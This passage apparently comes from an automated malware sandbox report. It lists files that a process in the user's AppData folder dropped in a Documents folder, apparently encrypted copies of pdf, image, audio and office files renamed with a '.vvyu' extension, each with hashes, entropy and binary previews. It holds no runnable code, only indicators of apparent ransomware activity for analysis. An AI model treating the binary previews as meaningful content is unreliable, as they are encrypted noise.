Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.830323170100401
Encrypted:	false
SSDEEP:	24:9djJc0UGKtenPprL9bL3mAJrXUHsdKyDMJVRTFsg5quJ5Jv81sbD:rFc0ZpNL3pFXUHskAMJfTFJtJ5BSmD
MD5:	E1EA9764E3DB804EECEE68778A881A30
SHA1:	21A0CAD21DB979540D680C8FC40FDBB76BAE654F
SHA-256:	BF96EAF1507CE57929BE91F4F7D7BF7AE0F5FBFD3F68A502C3EBEED769195393
SHA-512:	5E9038D73688D87E68C7F0D0B6ECC4494195DAEB668CF153BD10B8B798FAAF06CB9DB97A35A2CAE48A6BF9213310C5769250F27AE82D8883BE557028E5644F68
Malicious:	false
Preview:	EOWRV."..c.T,N.{.....b..w.._.X.1....:.Z!.~U.8vX..a.s..i...n.. ..c..'..u=...`.MF,{9.%.c..^R.]d...D.h.x.$)...Zg?5.w.u(......F....-...b.!......9A.m.p..../`VV.V..g...k....Z...`D..S.Yoy....k..i..M......ET......j...V,.4..m!/uk..'.M!.c`.;.t.\F.%..:..I...v..K,.M...0h..Q...l.2p...J.J..5..+..-....Y..W.Q.N....P.$2..NT.{....h..^..16.cf.S....'_...$}.5$_K....z.!]>..Q...M.X.EZ./..d..`_....6....2T.SGM....>JR..$w.>.3..Y\|.1.....(.C..n;JNQ.}/%.a4h..k.0....T\|&.d.;.=..B.......7w......u.....+.Kah...._.*V.-..+....w..~...<....dr.Y....N.......uZZE[!..&e.....V....^...&HxO.b...~I...t.....&I.L-.2S.QK.g...c...A.z.1.//...X.....a......}...Kr...?......'...;..AOE..7....[.T....M...4.q:...b.D.\. ......xe. ?..........;`.E..u./.w.].].[.gM.`^ v...p.=&...{...).u<.NwjG^[C.....r[...v........m+a....H.m`..6..Qwh.^.......3.'....W..9.f..T..;z.2.M.....L.r.G."9.......[_.5..EJ....P.Z.$\|\|i.50.6.bmM..F.s.[..u3DB...Ng[a....i....!%...~..tv....f......U&.:..0<.w....J...aG^].7..Zq......K..T.

C:\Users\user\Documents\EOWRVPQCCS.pdf.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.830323170100401
Encrypted:	false
SSDEEP:	24:9djJc0UGKtenPprL9bL3mAJrXUHsdKyDMJVRTFsg5quJ5Jv81sbD:rFc0ZpNL3pFXUHskAMJfTFJtJ5BSmD
MD5:	E1EA9764E3DB804EECEE68778A881A30
SHA1:	21A0CAD21DB979540D680C8FC40FDBB76BAE654F
SHA-256:	BF96EAF1507CE57929BE91F4F7D7BF7AE0F5FBFD3F68A502C3EBEED769195393
SHA-512:	5E9038D73688D87E68C7F0D0B6ECC4494195DAEB668CF153BD10B8B798FAAF06CB9DB97A35A2CAE48A6BF9213310C5769250F27AE82D8883BE557028E5644F68
Malicious:	false
Preview:	EOWRV."..c.T,N.{.....b..w.._.X.1....:.Z!.~U.8vX..a.s..i...n.. ..c..'..u=...`.MF,{9.%.c..^R.]d...D.h.x.$)...Zg?5.w.u(......F....-...b.!......9A.m.p..../`VV.V..g...k....Z...`D..S.Yoy....k..i..M......ET......j...V,.4..m!/uk..'.M!.c`.;.t.\F.%..:..I...v..K,.M...0h..Q...l.2p...J.J..5..+..-....Y..W.Q.N....P.$2..NT.{....h..^..16.cf.S....'_...$}.5$_K....z.!]>..Q...M.X.EZ./..d..`_....6....2T.SGM....>JR..$w.>.3..Y\|.1.....(.C..n;JNQ.}/%.a4h..k.0....T\|&.d.;.=..B.......7w......u.....+.Kah...._.*V.-..+....w..~...<....dr.Y....N.......uZZE[!..&e.....V....^...&HxO.b...~I...t.....&I.L-.2S.QK.g...c...A.z.1.//...X.....a......}...Kr...?......'...;..AOE..7....[.T....M...4.q:...b.D.\. ......xe. ?..........;`.E..u./.w.].].[.gM.`^ v...p.=&...{...).u<.NwjG^[C.....r[...v........m+a....H.m`..6..Qwh.^.......3.'....W..9.f..T..;z.2.M.....L.r.G."9.......[_.5..EJ....P.Z.$\|\|i.50.6.bmM..F.s.[..u3DB...Ng[a....i....!%...~..tv....f......U&.:..0<.w....J...aG^].7..Zq......K..T.

C:\Users\user\Documents\EWZCVGNOWT.jpg

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.841374153378465
Encrypted:	false
SSDEEP:	24:5cNhMNa8jdqZStnBvSeBFGNosXaaK1wHzSsSC1xmetasIl+lhxsbD:5khME8IcBayya9whD10dsI8lXmD
MD5:	6A11D127011B80F63CD2308A1D1230AB
SHA1:	2E60A5CB58246CA84B6008D71B4BC679B1CF4D3F
SHA-256:	301170E0B8C16976D441FB00F52E847F8208B576344DDF7D42592AC9F723560B
SHA-512:	F48043D5CBAB041882A49FE591EB4EC5D195166C04E950E1EAF80341244F5E7575FEAA929443C5EE3C0D7913BDFE136251E0734312955AF203ABEC73C042744E
Malicious:	false
Preview:	EWZCV]R.........m...;..d..g.c.tNd.......h..>w.4K_q.;.V..]T=$7....l.b..A.h..GP"bVd.P../i.;..6..L.M.X...+.9G....Y...5..up,f.{i.W..:z.J5.....;...g.y.j.........3.....;......,#.f.1.#;b.....!.....s.9{S.o.....4I.k.D{..EX..b......s%A.C..2..f..Z....L".]...i~...C...<.\|...../{E.~h...0.y...TQ1pr.......S\|oO..e..........jg.q.W<A.A.BS.r.6..h..;R..b.....1....t&+&......Kjv#H'..V........3..z..H.%&K.4..W..,.Vop.~.KQ..;a..........vs....\|..L7KV.r......3...6.T.^..9.! wT.?4.R.].H.`.2~..H.5@9..My..0.....c...@C.....;.......z..MQ.xN.1....ku.@.+.......g...u.g...2..".zn....S!.d..Ee..9..~e3b....,..ri-...t`~.....f...r.{..!A.G..b?...M....!>.(.;.......V.....I..9.....{j:!..}...?...a...k.p6.@.p<\592n......N.vsj...dWi...U.iy...vq.5.B.I.m..2.)..........i..H...QVd....=......(n....Ad`..^-..^..R22z.D. ........L..N...z..<.T....zD.H4...2)b.1;.....j.8@.r..$.......rri>.........."....n._o.....9.........=...6NY.(...G..F...?.....=(D.jm..H.%..OX...n.......O..J......Xq......k...}.

C:\Users\user\Documents\EWZCVGNOWT.jpg.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.841374153378465
Encrypted:	false
SSDEEP:	24:5cNhMNa8jdqZStnBvSeBFGNosXaaK1wHzSsSC1xmetasIl+lhxsbD:5khME8IcBayya9whD10dsI8lXmD
MD5:	6A11D127011B80F63CD2308A1D1230AB
SHA1:	2E60A5CB58246CA84B6008D71B4BC679B1CF4D3F
SHA-256:	301170E0B8C16976D441FB00F52E847F8208B576344DDF7D42592AC9F723560B
SHA-512:	F48043D5CBAB041882A49FE591EB4EC5D195166C04E950E1EAF80341244F5E7575FEAA929443C5EE3C0D7913BDFE136251E0734312955AF203ABEC73C042744E
Malicious:	false
Preview:	EWZCV]R.........m...;..d..g.c.tNd.......h..>w.4K_q.;.V..]T=$7....l.b..A.h..GP"bVd.P../i.;..6..L.M.X...+.9G....Y...5..up,f.{i.W..:z.J5.....;...g.y.j.........3.....;......,#.f.1.#;b.....!.....s.9{S.o.....4I.k.D{..EX..b......s%A.C..2..f..Z....L".]...i~...C...<.\|...../{E.~h...0.y...TQ1pr.......S\|oO..e..........jg.q.W<A.A.BS.r.6..h..;R..b.....1....t&+&......Kjv#H'..V........3..z..H.%&K.4..W..,.Vop.~.KQ..;a..........vs....\|..L7KV.r......3...6.T.^..9.! wT.?4.R.].H.`.2~..H.5@9..My..0.....c...@C.....;.......z..MQ.xN.1....ku.@.+.......g...u.g...2..".zn....S!.d..Ee..9..~e3b....,..ri-...t`~.....f...r.{..!A.G..b?...M....!>.(.;.......V.....I..9.....{j:!..}...?...a...k.p6.@.p<\592n......N.vsj...dWi...U.iy...vq.5.B.I.m..2.)..........i..H...QVd....=......(n....Ad`..^-..^..R22z.D. ........L..N...z..<.T....zD.H4...2)b.1;.....j.8@.r..$.......rri>.........."....n._o.....9.........=...6NY.(...G..F...?.....=(D.jm..H.%..OX...n.......O..J......Xq......k...}.

C:\Users\user\Documents\EWZCVGNOWT.mp3

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846838950056684
Encrypted:	false
SSDEEP:	24:hAvw+l6XExPo8HhY74btZsa6LV96PwvxOEx+ld3Lh9Ai/lIoVP3sbD:hAI+UXE9oiW74oT96UxOExWFh9l3mD
MD5:	F3642E82331C6F633ECE6F403935EAD4
SHA1:	4333FD5BD0A55B48922C5879CE887A4307A1F0CE
SHA-256:	AA547E1D39C8DDC059DED6C12091F825FD612A163FD41757DFC91BD2AE12F856
SHA-512:	A300E073AF4F8B1361AAA125545C5F275CF780852E0A64979112AA2D5AC3E17E682788A253A6665A83F15D5618374B425BCD0FE5FAF334DE2E405FB6D237D34A
Malicious:	false
Preview:	EWZCVY...\|]...w..<F5.z.x..o.u.?....;...V....UZi..,...7..y.N..H...o.#W...I....i..U..8:......}y...0...V...4...... w..x!...........D..d..E...@-W.r$"..z/c.F.Z..\.....(w..\|{..u.{b..7..J.N2.7Z.!...$.`0..t.....N..-X.D..=$..T.8..g..x..$<?...h#,yt.....+.z..Z2v.b>.]!..kc.eOw..'\|.k....g.<..>......... nB6.v..R).}A.&.4.@6..@...a:.X...va._.hK....<...UQ....H.hK..>tGB."z.....3Ch......X.b..}...C....{.t.pa^....@...V..uo).yb.2...@YWO..qnJY.}.5.d..M.M......Hp.<.)......k...Y...3[.o...w........r..j.......G.Y6k..../v...).q..\|'.........Bl...m...c.~U.)M}..N......o..]&.\p.?....Q..>...D...;..2V8.?.B.0.(.&.>r..{....v.~...+.0Y....]....T+cc.C.o..Aq...@..S.g........#.."&)... ...Bd".....m.V.IHf.+.t..Q;J...q..&,.c...y~..S..q../...w@U.D..9.K.2...j...lC.r.2..O...>...n4.B. .M.W....n...-..0S.0..Q.J...n.I..=..3CBNg.]I....P.,_.28o.L.y..yL.21....L..yui:z5..i...&..u%.A."..t.I....,.c$i.T....G.....t...U...ok...5..6}.;:.%.`a...t_B.....~..4$..$..&..t../..E..._+B...R.m..1

C:\Users\user\Documents\EWZCVGNOWT.mp3.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846838950056684
Encrypted:	false
SSDEEP:	24:hAvw+l6XExPo8HhY74btZsa6LV96PwvxOEx+ld3Lh9Ai/lIoVP3sbD:hAI+UXE9oiW74oT96UxOExWFh9l3mD
MD5:	F3642E82331C6F633ECE6F403935EAD4
SHA1:	4333FD5BD0A55B48922C5879CE887A4307A1F0CE
SHA-256:	AA547E1D39C8DDC059DED6C12091F825FD612A163FD41757DFC91BD2AE12F856
SHA-512:	A300E073AF4F8B1361AAA125545C5F275CF780852E0A64979112AA2D5AC3E17E682788A253A6665A83F15D5618374B425BCD0FE5FAF334DE2E405FB6D237D34A
Malicious:	false
Preview:	EWZCVY...\|]...w..<F5.z.x..o.u.?....;...V....UZi..,...7..y.N..H...o.#W...I....i..U..8:......}y...0...V...4...... w..x!...........D..d..E...@-W.r$"..z/c.F.Z..\.....(w..\|{..u.{b..7..J.N2.7Z.!...$.`0..t.....N..-X.D..=$..T.8..g..x..$<?...h#,yt.....+.z..Z2v.b>.]!..kc.eOw..'\|.k....g.<..>......... nB6.v..R).}A.&.4.@6..@...a:.X...va._.hK....<...UQ....H.hK..>tGB."z.....3Ch......X.b..}...C....{.t.pa^....@...V..uo).yb.2...@YWO..qnJY.}.5.d..M.M......Hp.<.)......k...Y...3[.o...w........r..j.......G.Y6k..../v...).q..\|'.........Bl...m...c.~U.)M}..N......o..]&.\p.?....Q..>...D...;..2V8.?.B.0.(.&.>r..{....v.~...+.0Y....]....T+cc.C.o..Aq...@..S.g........#.."&)... ...Bd".....m.V.IHf.+.t..Q;J...q..&,.c...y~..S..q../...w@U.D..9.K.2...j...lC.r.2..O...>...n4.B. .M.W....n...-..0S.0..Q.J...n.I..=..3CBNg.]I....P.,_.28o.L.y..yL.21....L..yui:z5..i...&..u%.A."..t.I....,.c$i.T....G.....t...U...ok...5..6}.;:.%.`a...t_B.....~..4$..$..&..t../..E..._+B...R.m..1

C:\Users\user\Documents\GRXZDKKVDB.png

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.85269703972216
Encrypted:	false
SSDEEP:	24:ANdPk5eVUtJxaFs5MRKzNAn2V21qKaf5tuGhyFVBi5qsy43+sbD:APP4GULWTaNJV2riVYB2ryFmD
MD5:	6DAF9BF7450CE915BEDE11BE663ED4D9
SHA1:	B6B176463AC7E1F8F80634C6AE7482075337D572
SHA-256:	F6A11AD7001D51B78A35B327E58A53F4C4FCBA455268EDED1709E67567F16E80
SHA-512:	B6ED2248791A917282DEC8AD37255E093BE3E4D92C06E14704798A6C7469EF29BF3BCE23B8D7853CCA0AC18BF3C6B32D66BCDD9F84AD9189126D82CB9E95AB52
Malicious:	false
Preview:	GRXZD............0X...{u3,..@0u..!_t.v5..;"r........../%............Y,...$b..........BPA.2..B..gl...UIux...)......W.%..........w6Y4p...6su..qI&..[..s.h..8]........m..){z.i.u.7!.iT..1y....'.%-..h..Ap......z..4..G....PN.K.C...#.....>./.$r/......>9\...%..t...n.J`.......)..MG.vx.-.B.+o....9.v.hFa.L.8.7=;..YU/b.......Z.#..s.X.;!W.>.O.;.=.7\|..&P"q. $ ..olm...n.BZ<...~..4=...>.$..J..S.mu.i...B..Y...v....%...n....S....R...r.9;.N.c.^.$.J<.S'....n.v.J......@#L. .....$.0.\|....g..J.K..... Y.;...........h..4.@.+...K&.m....4.P.e{..........1..]V.w...>...JD.c..../r....b.>Y..'.i.w...v..C}.TMUe5?&.R....@m.0D.+.T.....S.j.h"#...S6.Tee...j\|:.)..s.}...,..F...8=..$jq`(>H.pW.$...".ZC...VXs...o.......@[.^.;N.........~.....o..1?t....[W.'......8.>^. .$...LR..8.....#....-..b....f.8....F...}....O.XH...<...K....`ij...;f.....O...~V..F....9.e.....^......[n.n#..\|..q...i...X.a.r..3....*.p..0.-9..C7.Z.....@..K.......j...0.).1e......P..a..1S.u./5ev}....V.

C:\Users\user\Documents\GRXZDKKVDB.png.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.85269703972216
Encrypted:	false
SSDEEP:	24:ANdPk5eVUtJxaFs5MRKzNAn2V21qKaf5tuGhyFVBi5qsy43+sbD:APP4GULWTaNJV2riVYB2ryFmD
MD5:	6DAF9BF7450CE915BEDE11BE663ED4D9
SHA1:	B6B176463AC7E1F8F80634C6AE7482075337D572
SHA-256:	F6A11AD7001D51B78A35B327E58A53F4C4FCBA455268EDED1709E67567F16E80
SHA-512:	B6ED2248791A917282DEC8AD37255E093BE3E4D92C06E14704798A6C7469EF29BF3BCE23B8D7853CCA0AC18BF3C6B32D66BCDD9F84AD9189126D82CB9E95AB52
Malicious:	false
Preview:	GRXZD............0X...{u3,..@0u..!_t.v5..;"r........../%............Y,...$b..........BPA.2..B..gl...UIux...)......W.%..........w6Y4p...6su..qI&..[..s.h..8]........m..){z.i.u.7!.iT..1y....'.%-..h..Ap......z..4..G....PN.K.C...#.....>./.$r/......>9\...%..t...n.J`.......)..MG.vx.-.B.+o....9.v.hFa.L.8.7=;..YU/b.......Z.#..s.X.;!W.>.O.;.=.7\|..&P"q. $ ..olm...n.BZ<...~..4=...>.$..J..S.mu.i...B..Y...v....%...n....S....R...r.9;.N.c.^.$.J<.S'....n.v.J......@#L. .....$.0.\|....g..J.K..... Y.;...........h..4.@.+...K&.m....4.P.e{..........1..]V.w...>...JD.c..../r....b.>Y..'.i.w...v..C}.TMUe5?&.R....@m.0D.+.T.....S.j.h"#...S6.Tee...j\|:.)..s.}...,..F...8=..$jq`(>H.pW.$...".ZC...VXs...o.......@[.^.;N.........~.....o..1?t....[W.'......8.>^. .$...LR..8.....#....-..b....f.8....F...}....O.XH...<...K....`ij...;f.....O...~V..F....9.e.....^......[n.n#..\|..q...i...X.a.r..3....*.p..0.-9..C7.Z.....@..K.......j...0.).1e......P..a..1S.u./5ev}....V.

C:\Users\user\Documents\NVWZAPQSQL.docx

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.833429196173042
Encrypted:	false
SSDEEP:	24:FUIwzN7sR7bWbZedFy54MXVKq5OLseE8BEhQw6o/+WPtztWRGEm89Wjv/s06sbD:FUIwzN7gebZedFyRlKC/WpWDia89WjXZ
MD5:	EEF2FF4016F8BBD369FDD46188B5A4CE
SHA1:	D2099E8F08510848A9BC646782F6987AC1F09FE3
SHA-256:	717087CCFB0C1C9A8ACCF1FD05376F8BFD991C94CA0DF763DE9B958E816C28C6
SHA-512:	D96DB19E6FBE8273434FE9390D2E5836BB1A7D909A3036586B0C3F07C826C3699089839A576DFA4A89CD607232693FD4B9C9B82FF17116616912058A131F3703
Malicious:	false
Preview:	NVWZA...u..OH..^2...h...\|........E......5A\|'..0.5.E.+.{.....}...je.<J..A......T~u6....u.K..2.3U..+V....P4U.....?]....h2`5....e...u.]..T..\#u.@..R..(@.I<.../.....lKJ.Sy.d.o.m}.l.R......zj,"!...t..y=.....G;Q.0.\b...1....a'.-.......m..2..Q..2:6..dJ..1KfMUB.\|.XDb1._Fi..{$.>.0....T.wE....#.G!5h.x.l.....F... .._4......2..>..S....$^...j..$....I...\.x-.~.X.Y............,.!7...1. ...A.....Q.\|Zh{^.../...d...TK............LA.....=.&Yb...WH..X..Dy.}5...m.M..<t.u1....C..J(..-#P.X$e....Q..l.l... ..\|XZ.\|.9..w.\|/.R.$..Z.tZw........~"c..*..W.nR=9.Xh./I.(.p..+v6..9\|..O.8..D.c.]5!mEnV?...H.......O .I.Es..l.s.P.....G?...B...X......{...S..~..D.=YQ}..F..D.....u...H..s.-#n&!W.f.7.{.].C..Sep..'..=..,..tW....l9....{Z...VXC...4.0.'..1:.^.t....=,.Kp..J...`...#.8..d...iJ[c.I..t.0.(.....@...a[.X H`.2q..H..>.#.5.l4..].....0k..\.k..S....P..8:.c...o.NF>q-.l.a......u.7.bnOx....\.D>H."....K....0..m.[.\|..}...Q....m.a.W.C+O#-.)..e.i......-k............\.QH.R._Z..o..lcd...dl.

C:\Users\user\Documents\NVWZAPQSQL.docx.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.833429196173042
Encrypted:	false
SSDEEP:	24:FUIwzN7sR7bWbZedFy54MXVKq5OLseE8BEhQw6o/+WPtztWRGEm89Wjv/s06sbD:FUIwzN7gebZedFyRlKC/WpWDia89WjXZ
MD5:	EEF2FF4016F8BBD369FDD46188B5A4CE
SHA1:	D2099E8F08510848A9BC646782F6987AC1F09FE3
SHA-256:	717087CCFB0C1C9A8ACCF1FD05376F8BFD991C94CA0DF763DE9B958E816C28C6
SHA-512:	D96DB19E6FBE8273434FE9390D2E5836BB1A7D909A3036586B0C3F07C826C3699089839A576DFA4A89CD607232693FD4B9C9B82FF17116616912058A131F3703
Malicious:	false
Preview:	NVWZA...u..OH..^2...h...\|........E......5A\|'..0.5.E.+.{.....}...je.<J..A......T~u6....u.K..2.3U..+V....P4U.....?]....h2`5....e...u.]..T..\#u.@..R..(@.I<.../.....lKJ.Sy.d.o.m}.l.R......zj,"!...t..y=.....G;Q.0.\b...1....a'.-.......m..2..Q..2:6..dJ..1KfMUB.\|.XDb1._Fi..{$.>.0....T.wE....#.G!5h.x.l.....F... .._4......2..>..S....$^...j..$....I...\.x-.~.X.Y............,.!7...1. ...A.....Q.\|Zh{^.../...d...TK............LA.....=.&Yb...WH..X..Dy.}5...m.M..<t.u1....C..J(..-#P.X$e....Q..l.l... ..\|XZ.\|.9..w.\|/.R.$..Z.tZw........~"c..*..W.nR=9.Xh./I.(.p..+v6..9\|..O.8..D.c.]5!mEnV?...H.......O .I.Es..l.s.P.....G?...B...X......{...S..~..D.=YQ}..F..D.....u...H..s.-#n&!W.f.7.{.].C..Sep..'..=..,..tW....l9....{Z...VXC...4.0.'..1:.^.t....=,.Kp..J...`...#.8..d...iJ[c.I..t.0.(.....@...a[.X H`.2q..H..>.#.5.l4..].....0k..\.k..S....P..8:.c...o.NF>q-.l.a......u.7.bnOx....\.D>H."....K....0..m.[.\|..}...Q....m.a.W.C+O#-.)..e.i......-k............\.QH.R._Z..o..lcd...dl.

C:\Users\user\Documents\NVWZAPQSQL\BJZFPPWAPT.xlsx

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.857789303661773
Encrypted:	false
SSDEEP:	24:8MIV64i+Y68fqsIRnuOxbq788AVutOCk4uIf+BrFEAc1a2sZALPHTK/6sbD:xgY6KKnzbC88AwtDTnf+rOAcRHTKSmD
MD5:	6FA9FF80AE996695A94F76A245BC7628
SHA1:	096BF4762E30F0A9F249E188E3EDFF2F3ECA4F53
SHA-256:	C1AA82B286F86C95F5039F421E76911C71398328DC70C1D12E85648B5E35C23F
SHA-512:	08820130C9E4B6AD173E6422C4180900F81DFB55D38F68FA047D71D47499C2463F5599A12E20424F5F1631F3430245CAAEE3DBB5F695DFAF14DC2053F0306557
Malicious:	false
Preview:	BJZFP...o.\.k.............N[.N'.....%...R.D.6.:Q..-P.V._O.[G....-s..8z...].Z0Z.4...{.O[..!...8rla..\|./.QR+.....:..9=.k....jY..<l...{..C..pg..n.B2X......_..fu..C...........dU..y....h....M.V...rz..\h. Z;5...$c.$}.$..r.o.'..,....5z.C.e...hx#Y..Q..J..:Momg.i4S.....dF..H......-..9.].t......FK.......:.5.....v.~.>......Wxj#....:...S#.._...J..:g..<.+l........o.rzd.^m.RY.Cb.@0~f_.N.<....qt-...ATw..q..Gx\|......QJ..4Y....{p:..z.c.Kh.........q.Nf..'9U;....M........M..V..O9Z1.+.]$f... l....$_.(....o..3.T..W......=.+...B..4..d.7...sn.?.Tu~<.\...H;..$1...S...Y....b....F..K.G...Z..0..1.~.).....[..q..&..l..{.J...O.{o ..Q..Di..fz.tQE...L.....q.....:.,[...D.J...eq.Q....I.H..h:M..h@.fy..."...oZ.5bl.S..R.q.+.u..~4...........@P.u4g..:.ZG.....c..K.;..<X...W..x....^..xV...1....hx..E.r..2Z..q(.}K...>.0.[......'.......K.+. 3....U5"X,<.Z.p0M....%.+....N:.=......q..(.QG..K.#. .....H.vF....U.:X.._..j..CP.Y..:.......I.S`...l.Pjd9N..E.X#.....:..b..0DfI.........'..!..

C:\Users\user\Documents\NVWZAPQSQL\BJZFPPWAPT.xlsx.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.857789303661773
Encrypted:	false
SSDEEP:	24:8MIV64i+Y68fqsIRnuOxbq788AVutOCk4uIf+BrFEAc1a2sZALPHTK/6sbD:xgY6KKnzbC88AwtDTnf+rOAcRHTKSmD
MD5:	6FA9FF80AE996695A94F76A245BC7628
SHA1:	096BF4762E30F0A9F249E188E3EDFF2F3ECA4F53
SHA-256:	C1AA82B286F86C95F5039F421E76911C71398328DC70C1D12E85648B5E35C23F
SHA-512:	08820130C9E4B6AD173E6422C4180900F81DFB55D38F68FA047D71D47499C2463F5599A12E20424F5F1631F3430245CAAEE3DBB5F695DFAF14DC2053F0306557
Malicious:	false
Preview:	BJZFP...o.\.k.............N[.N'.....%...R.D.6.:Q..-P.V._O.[G....-s..8z...].Z0Z.4...{.O[..!...8rla..\|./.QR+.....:..9=.k....jY..<l...{..C..pg..n.B2X......_..fu..C...........dU..y....h....M.V...rz..\h. Z;5...$c.$}.$..r.o.'..,....5z.C.e...hx#Y..Q..J..:Momg.i4S.....dF..H......-..9.].t......FK.......:.5.....v.~.>......Wxj#....:...S#.._...J..:g..<.+l........o.rzd.^m.RY.Cb.@0~f_.N.<....qt-...ATw..q..Gx\|......QJ..4Y....{p:..z.c.Kh.........q.Nf..'9U;....M........M..V..O9Z1.+.]$f... l....$_.(....o..3.T..W......=.+...B..4..d.7...sn.?.Tu~<.\...H;..$1...S...Y....b....F..K.G...Z..0..1.~.).....[..q..&..l..{.J...O.{o ..Q..Di..fz.tQE...L.....q.....:.,[...D.J...eq.Q....I.H..h:M..h@.fy..."...oZ.5bl.S..R.q.+.u..~4...........@P.u4g..:.ZG.....c..K.;..<X...W..x....^..xV...1....hx..E.r..2Z..q(.}K...>.0.[......'.......K.+. 3....U5"X,<.Z.p0M....%.+....N:.=......q..(.QG..K.#. .....H.vF....U.:X.._..j..CP.Y..:.......I.S`...l.Pjd9N..E.X#.....:..b..0DfI.........'..!..

C:\Users\user\Documents\NVWZAPQSQL\EOWRVPQCCS.pdf

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.845023388980199
Encrypted:	false
SSDEEP:	24:skN9pieMILsdf41XkJC22rncqTwZSlg0SDshAOZjgedaegbk9c8sbD:3+eFLsdwKJ6jcqTwZ2w2AOdgedaZic8+
MD5:	A2FC258F2767A08C9224F143883BE5E8
SHA1:	0B418148A570AC7C7068B6F98C3F93889EF019AD
SHA-256:	509BDCCF58FD18F1F8AEDF821694173DAF9E8C1E877A69C7ECD8C3954B095A9E
SHA-512:	FE7CA75FCFE2502E63E173375AF49BD0C14E74EBB2AB4648E585E2348F5262F006994A9DBD23242AF3A619E7B0D2BEC5A341815547AA7D3B3B14A73B5C38D72D
Malicious:	false
Preview:	EOWRV.$ nKg.... .$.F.N...Pm-..0....[rf..!..<d...g.."...u}..'+....:av..1.g...G..Z..q.n"...8.4q....{U.e...$5(....O......:...7u T....8T>..{....`h.J.....Ax#..............9<....D....d.p.\|2......B..k,.'g.'.A.\|.}....qM.r.......k.({?.../..0Q...._.1.....n.....D.:...l....../.@.._.5k......x......@..#%..x.'...,Y;K..A..\|..:h.]E....../.....a^\.....v..._;.tu..k=\|.]...(.G.........&.(%.bq".>.....:..sB?...A@...KJ..Z..]...-.^..X.vf.]?EQ....A..#.f]!..F..<hs.+-.].N)..po\.y0.V4)W. '.j...QO...#..e[`..n.{X.....#.-.9.!.\|...\..$..G.l...>.H.Y.k......].}.\;9.M5...xw.....W{.....).q......=.%,.F.F....j~v-.N._.,...D.c...yN...\|b.a.yK..)p..r..lp.....2.Zq(c......n%A.... .........Ok.L.....>`.{.g.:A..@.O.Ti..[....K/....f..p...Z....x.V.?G..^h.....LQ..A........N.{..X+=!ogTc.\|..^.%.8.[+.#..D.8.p....... .Mk8.u...M\..N.I..."K.vm...[f.'../....\.....N.w-.#.....j.:&}....p?.J*R+...q..nS..........Z..Sc;.i\.).....H.5V.8y..3L..FL....hE6.<......luS.$.....<.u.>.2.-..e[...&.

C:\Users\user\Documents\NVWZAPQSQL\EOWRVPQCCS.pdf.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.845023388980199
Encrypted:	false
SSDEEP:	24:skN9pieMILsdf41XkJC22rncqTwZSlg0SDshAOZjgedaegbk9c8sbD:3+eFLsdwKJ6jcqTwZ2w2AOdgedaZic8+
MD5:	A2FC258F2767A08C9224F143883BE5E8
SHA1:	0B418148A570AC7C7068B6F98C3F93889EF019AD
SHA-256:	509BDCCF58FD18F1F8AEDF821694173DAF9E8C1E877A69C7ECD8C3954B095A9E
SHA-512:	FE7CA75FCFE2502E63E173375AF49BD0C14E74EBB2AB4648E585E2348F5262F006994A9DBD23242AF3A619E7B0D2BEC5A341815547AA7D3B3B14A73B5C38D72D
Malicious:	false
